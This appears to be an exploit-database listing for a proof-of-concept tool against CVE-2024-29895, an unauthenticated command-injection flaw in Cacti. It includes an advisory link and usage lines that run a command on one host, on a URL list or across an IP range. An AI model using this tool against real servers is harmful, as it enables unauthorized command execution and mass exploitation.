## https://sploitus.com/exploit?id=FC4AF151-21FA-5BED-ADBF-95FFE4871D81
# CVE-2024-29895
Cacti CVE-2024-29895 POC
A command injection vulnerability allows any unauthenticated user to execute arbitrary command on the server when register_argc_argv option of PHP is On.
https://github.com/Cacti/cacti/security/advisories/GHSA-cr28-x256-xf5m
Usage: app -m http://site.com/ -c whoami
Or: app -w url_list.txt -c whoami
Or: app -r 192.168.1.0/24 -c whoami